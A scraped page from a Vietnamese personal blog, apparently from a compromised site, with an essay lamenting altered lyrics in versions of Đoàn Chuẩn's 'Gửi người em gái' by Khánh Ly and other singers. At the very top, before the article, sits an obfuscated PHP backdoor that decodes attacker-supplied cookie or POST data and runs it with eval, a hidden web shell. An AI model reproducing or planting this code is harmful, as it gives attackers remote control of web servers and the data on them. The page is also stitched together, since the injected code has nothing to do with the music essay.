$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> Ôi, gửi người em gái miền Nam – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Ôi, gửi người em gái miền Nam

Trong số các nhạc sĩ của nền nhạc trữ tình Việt Nam, bản thân tôi thấy lạ nhất là trường hợp nhạc của Đoàn Chuẩn. Tôi không biết mọi người nghe nhạc của ông thấy thế nào, chứ riêng tôi, rất hiếm khi xảy ra cái cảm giác chẳng biết là thích, hay là không; khó xác định đối với mình là hay, hoặc là dở như với các bài của ông. Tôi đã từng có nhiều lúc cả ngày chỉ nghe đi nghe lại album gồm các bài của Đoàn Chuẩn, nghe xong rồi vẫn không rõ mức độ yêu thích của mình.

Có nhiều bài nhạc của Đoàn Chuẩn, nếu hỏi tôi nhớ lời hay không, thì chắc chắn là tôi sẽ trả lời không, nhưng nếu nhạc của bài nào đó vang lên, thì tôi lại có thể hát theo ngay.

Nhạc của Đoàn Chuẩn cứ tự nhiên đi vào tâm trí tôi như thế.

***

Trong các bài của Đoàn Chuẩn, tôi thích nhất là “Lá đổ muôn chiều”, chỉ vì hai câu kết rất đạt

Nhớ nhau đành tìm trong tiếng hát
Đời vắng em rồi vui với ai

nó rất giống câu kết trong một bài thơ của Vũ Hoàng Chương, nhưng hoàn toàn không sáo rỗng, người đọc/ người nghe không có cảm giác sao chép lộ liễu (trường hợp “Nửa hồn thương đau” của Phạm Đình Chương mượn ý thơ Thanh Tâm Tuyền cũng thế).

Ngoài ra, các bài còn lại của Đoàn Chuẩn, tôi đều có cảm giác quen thuộc như nhau.

***

Bình thường khi nghe nhạc Đoàn Chuẩn, tôi rất ít khi suy nghĩ nhiều, ít khi để ý tới lời bài hát, vì mỗi khi ca sĩ cất giọng lên, thì dường như những lời ấy tự động chạy ngang trong đầu tôi. Đột nhiên sáng nay tới công ty sớm, lâu lắm rồi mới có cảm giác đi làm sớm, chỉ bởi vì tối qua mất net nên phải ngủ một mạch từ 11h đêm, nên sáng ra tươi phơi phới vì được ngủ như con heo bự. Tới công ty, ngồi lướt Facebook vu vơ, và lên Mp3 Zing, chọn đại album nào đó nghe. Đại loại là lúc nào ngồi trước máy vi tính, thì tôi phải có cái gì đó để nghe.

Hôm nay chả hiểu sao chọn nghe “Nơi tôi sinh Hà Nội” của Minh Quân. Sau bài “Hà Nội ngày tháng cũ” nghe tàm tạm, thì tôi có hứng nghe tới “Gửi người em gái”.

“Gửi người em gái” tôi nghe không tới ngàn lần thì cũng phải vài trăm, ừ thôi, thì vài chục lần vậy, không lại bị gọi là chém gió. Nhấm nháp từng ngụm cafe nghi ngút khói, ngả người trên cái ghế êm và nhìn ra bầu trời Texas xanh thẳm, bên tai tôi văng vẳng từng giai điệu quen thuộc. Bất chợt…

Cái gì đây nhỉ? Đây đâu phải là “Gửi người em gái”!

***

Cũng lạ, đây không phải lần đầu tiên tôi nghe “Gửi người em gái”, nhưng thình lình đây là lần đầu tiên tôi có cảm giác thật – sự – bực – bội vì bài hát bị sửa đổi một cách hết sức thiếu tôn trọng tác giả.

“Gửi người em gái” đúng như nguyên tác, có lẽ là version của Ngọc Bảo. Ai từng nghe qua version này, như gần đây là trong album “Lời du tử” của ông, để ý xíu ắt sẽ ngạc nhiên vì nó dài tới 8 phút, gần gấp đôi những version còn lại trên mạng của các ca sĩ khác.

Trước đây, tôi có đọc đâu đó là “Gửi người em gái” khi được đưa vào Nam hát đã bị chỉnh sửa nhiều chỗ hết sức – vô – lý bởi Khánh Ly. Có nhiều chỉnh sửa không làm thay đổi rõ ràng cái ý liền mạch của tác phẩm (như anh giải phóng – anh du kích trong bài “Sơn nữ ca” của Trần Hoàn), nhưng việc chỉnh sửa này, đúng là, hoàn toàn thay đổi rất nhiều ý nghĩa bài hát.

Dù biết vào thời điểm đó, vì lí do chính trị, Khánh Ly buộc phải đổi lời như thế, nhưng tôi rất ngạc nhiên khi thấy sau này, khi mà âm nhạc được cởi trói một phần nào rồi, rất nhiều ca sĩ vẫn vô tư lự hát theo lời của Khánh Ly. Đã có thời điểm, người ta xem nhạc Đoàn Chuẩn (hay nói rộng hơn là nhạc tiền chiến, nhạc trữ tình…) như cái mốt để đánh bóng mình, ca sĩ nào cũng đua nhau hát. Vì thế, từ một version – sai – của – Khánh – Ly, nó bị biến tấu thành nhiều version – sai – và – sai khác.

Ngồi thử nghe “Gửi người em gái” của nhiều ca sĩ, tôi thấy choáng váng vì sự hỗn loạn, thiếu thống nhất, kiểu các ca sĩ muốn hát gì thì hát, lấy từ version này một ít, version kia một ít.

Nhìn chung, “Gửi người em gái” có 3 kiểu hát nổi bật:

    Version gốc như Ngọc Bảo: Tài tử Ngọc Bảo là một tên tuổi lớn, một giọng hát hiếm có trong nền âm nhạc Việt Nam. Nhưng với nhiều người ngày nay, có lẽ họ chả biết tới Ngọc Bảo là ai. Chính vì thế, dù đây là version đúng nhất (theo ý tôi), vẫn không nhiều người hát.
    Xa xa thì có Lê Dung hát đúng. Gần hơn nữa thì có Trần Thu Hà. Tôi không nhớ nhiều lắm về version của Hà, nhưng chỉ nghe tới khúc Rồi từ ngày ấy sống trong Nam nơi kim tiền bị Hà ‘nhầm lẫn’ hát thành Rồi từ ngày ấy sống xa anh nơi kim tiền là đã bấm ngay nút close đóng ngay version đó lại. Ôi, đã bỏ công hát đúng với version gốc, thì tại sao phải sửa hai chữ đơn giản như thế?
    Version tiếp theo được sử dụng và học theo nhiều nhất, là version của Khánh Ly. Dù sao Khánh Ly cũng là một trong những ca sĩ lớn nhất của nền âm nhạc Việt Nam, nên nhiều người xem cô là chuẩn mực cũng đúng thôi. Version của Khánh Ly bỏ đi nhiều đoạn, trong đó đáng tiếc nhất là đoạn mà tôi thấy rất hay:

    Xuân năm nay, đường đêm Catinat
    Hoa mai rơi, rủ nhau nơi phương xa
    Dần trắng xóa mặt đường
    Một người em gái nhớ người thương!

    Cái ý ‘trắng xóa mặt đường’ hay thế, tại sao không được xài, mà thay bằng ‘nhìn xác pháo bên thềm’, và ‘một người em gái nhớ người thương’ bị đổi thành ‘gợi lòng tôi nhớ tới người em’.

    Hay

    Đời nghèo không lối thoát, em tôi đành thôi, cúi đầu… mà đi.

    bị đổi thành

    Tình nghèo xa cách mãi em tôi đành ôm mối sầu mà đi

    Ngay cả Ánh Tuyết, người được đánh giá là hát nhạc Đoàn Chuẩn rất thành công, cũng hát theo version này. Cả những diva tên tuổi như Thanh Lam cũng thế. Tâm trạng tôi là: thất vọng.

    Version còn lại là các version khác. Như Anh Ngọc và Tuấn Ngọc thì chọn cách lập lại từ đoạn: Tôi có người em gái, tuổi chớm đôi mươi, và thay đổi rất nhiều từ lẻ.
    Ngoài ra còn các version như kiểu Hồng Nhung, vẫn hát đoạn Rồi ngày thống nhất đến rất nhanh không ai ngờ… nhưng ngoài việc hát anh đến tìm em… giữa cầu Hiền Lương thành anh đến chờ em… giữa cầu Hiền Lương thì cô còn bỏ đi đoạn đẹp nhất trong bài là

    Xuân năm nay, đường đêm Catinat…

Đại loại là các version khác, đều mang một chút ý rất hay từ version gốc, người có chỗ này, thiếu chỗ kia; người thiếu chỗ này, nhưng có chỗ kia; trong khi việc đơn giản là hát lại y như version gốc, thì không mấy ai làm (gần đây có hai bạn trẻ Nathan Lee và Thu Minh hát đúng lời, nhưng giọng và cách phối thì dở tệ).

Ôi, gửi người em gái miền Nam mà thiếu những câu như

Dần trắng xóa mặt đường
Một người em gái nhớ người thương!

hay

Lòng anh như giấy trắng thanh tân ép hoa tàn

hay

Trời Bắc lóa ánh đèn
Một người trên đất Bắc chờ em!

thì có còn là Gửi người em gái miền Nam nguyên gốc nữa không…

111110,
B.l.u.e

p/s:
– link youtube http://www.youtube.com/watch?v=a8AZnUxsKQo
– link mp3: http://www.mediafire.com/?aaz9kffibh169p1
.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.